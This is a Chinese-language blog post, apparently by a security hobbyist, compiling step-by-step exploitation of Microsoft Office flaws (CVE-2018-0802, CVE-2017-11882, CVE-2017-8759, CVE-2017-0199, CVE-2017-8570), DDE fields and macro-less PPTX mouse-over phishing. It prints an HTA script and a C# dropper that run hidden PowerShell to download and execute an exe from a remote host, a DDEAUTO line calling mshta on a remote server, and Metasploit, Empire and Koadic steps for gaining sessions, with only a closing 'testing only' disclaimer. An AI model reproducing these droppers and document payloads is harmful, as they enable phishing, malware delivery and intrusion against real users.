Office漏洞利用大全

最近office又爆出漏洞CVE-2018-0802，身为地地道道的中国人岂能不凑热闹。之前又看到了不少类似的文章，我就把近期比较好玩的有关office的漏洞利用姿势做个合集！

参考链接：

CVE-2018-0802

https://github.com/Ridter/RTF_11882_0802

https://github.com/rxwx/CVE-2018-0802

http://www.freebuf.com/vuls/159789.html

https://evi1cg.me/archives/CVE_2018_0802.html

CVE-2017-11882

https://github.com/Ridter/CVE-2017-11882

https://evi1cg.me/archives/CVE_2017_11882_exp.html

http://www.freebuf.com/vuls/154462.html

DDE

http://www.freebuf.com/articles/system/153105.html

http://www.freebuf.com/articles/terminal/150285.html

http://bobao.360.cn/learning/detail/4592.html

CVE-2017-8759

https://github.com/vysec/CVE-2017-8759

https://bbs.77169.com/forum.php?mod=viewthread&tid=364738

CVE-2017-0199

http://www.91ri.org/16953.html

CVE-2017-8570

http://www.freebuf.com/vuls/144054.html

https://github.com/tezukanice/Office8570

Koadic

https://github.com/zerosum0x0/koadic

Empire

https://github.com/EmpireProject/Empire

我们先看最新的CVE-2018-0802漏洞

大佬的脚本基本都很齐全了，我做一下补充。丢弃kali，用远控来实现。

不言而喻，-I test.rtf来加入CVE-2018-0802的漏洞文档，-c "cmd.exe /c calc.exe"来加入CVE-2017-11882的执行命令。

在这里

https://www.demmsec.co.uk/2018/01/exploiting-fully-patched-office-2016-using-cve-2018-0802/

说明了一种CVE-2018-0802powershell代码的植入方式。然后编译为exe文件，

https://github.com/rxwx/CVE-2018-0802

packager_exec_CVE - 2018 - 0802. py - e executable_path - o output_file_name

生成CVE-2018-0802的漏洞文档。

我们修改一下，在上次CVE-2017-11882的漏洞利用中我们用到了远控上线，当时的HTA代码如下：

Sub window_onload

  window.resizeTo 0,0

  window.MoveTo -100,-100

  const impersonation = 3

  Const HIDDEN_WINDOW = 12

  Set Locator = CreateObject("WScript.Shell")

  Locator.Run"powershell.exe -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'",0,FALSE

  window.close()

end sub

我们将powershell的下载地址替换Empire的代码即可，那么我们的cs文件

using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

namespace shell

{

  class Program

  {

      static void Main(string[] args)

      {

          string strCmdText;

          strCmdText = "powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'";

          System.Diagnostics.Process.Start("powershell.exe",strCmdText);

      }

  }

}

我们用csc编辑成exe发现报错，把文件路径换成\\

完成

我们测试exe文件是否可以正常打开上线！没有问题！

最后我们就把CVE-2018-0802和CVE-2017-11882漏洞利用文档综合到一起即可！

2.CVE-2017-11882漏洞，首先使用大宝剑建立链接

PS:大宝剑获取非英文版系统的shell会有报错

UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0xe5 in position 108: ordinal not in ran

解决办法就是在koadic文件中增加utf-8编码

之后使用exp脚本生成文档

复制测试！获得会话！！

宿主进程状态

3.office的DDE应该不用多说了吧，直接开搞

新建word文档，按下CTRL+F9

在其中插入

DDEAUTO c:\\windows\\system32\\cmd.exe “/k mshta http://192.168.188.147:66/LaLHL”

保存即可！然后打开测试！

获得会话！

宿主进程状态

更多姿势：http://bobao.360.cn/learning/detail/4592.html

4.CVE-2017-8759的复现，这个漏洞本身是.NET的问题……话不说直接开干！

在kali中使用Empire生成HTA后门

修改exploit.txt文件

开启apache或者使用python -m SimpleHTTPServer建立链接

并且把HTA上传到同一路径下。

然后使用word新建一个rtf，插入一个链接到文件的对象

http://192.168.1.118:808/exploit.txt

然后使用C32编辑blob.bin，修改位置如下

右键拷贝HEX格式所有，使用编辑器打开rtf文件替换代码

再将objautlink前插入objupdate

保存修改后我们测试一下效果！

(o゜▽゜)o☆[BINGO!]

5.CVE-2017-0199的话就更简单了…

下载漏洞利用脚本

wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat，然后打开msf生成hta文件链接

然后使用刚才下载的exp设置参数

Run后复制文件到靶机测试

查看会话

6.CVE-2017-8570同样还是一梭子搞定！

使用脚本生成恶意ppsx文件

使用msfvenom生成exe后门

再次使用脚本建立链接

打开msf建立监听

复制文件测试！获得会话！！

最后再普及一个姿势！

无需加载宏之PPTX钓鱼

首先新建一个PPT，插入内容

勾选文字插入动作

鼠标移过时的动作，选择运行程序

这里咱们插入一段powershell代码

之后把它插入到运行程序选项框里

确定保存就可以了，咱们测试一下。

当鼠标滑过…

(o゜▽゜)o☆[BINGO!]

PS：也可将动作插入到形状里面的空白动作按钮

然后覆盖全屏，并设置无线条无填充

攻防无绝对，技术无黑白

技术仅供测试使用，请勿用做非法用途！

你可能喜欢最新变种利用OFFICE漏洞绕过多家杀软最新Office 0day漏洞(CVE-2017-11826)在野攻击通告Office最新0day漏洞 所有Word版本受影响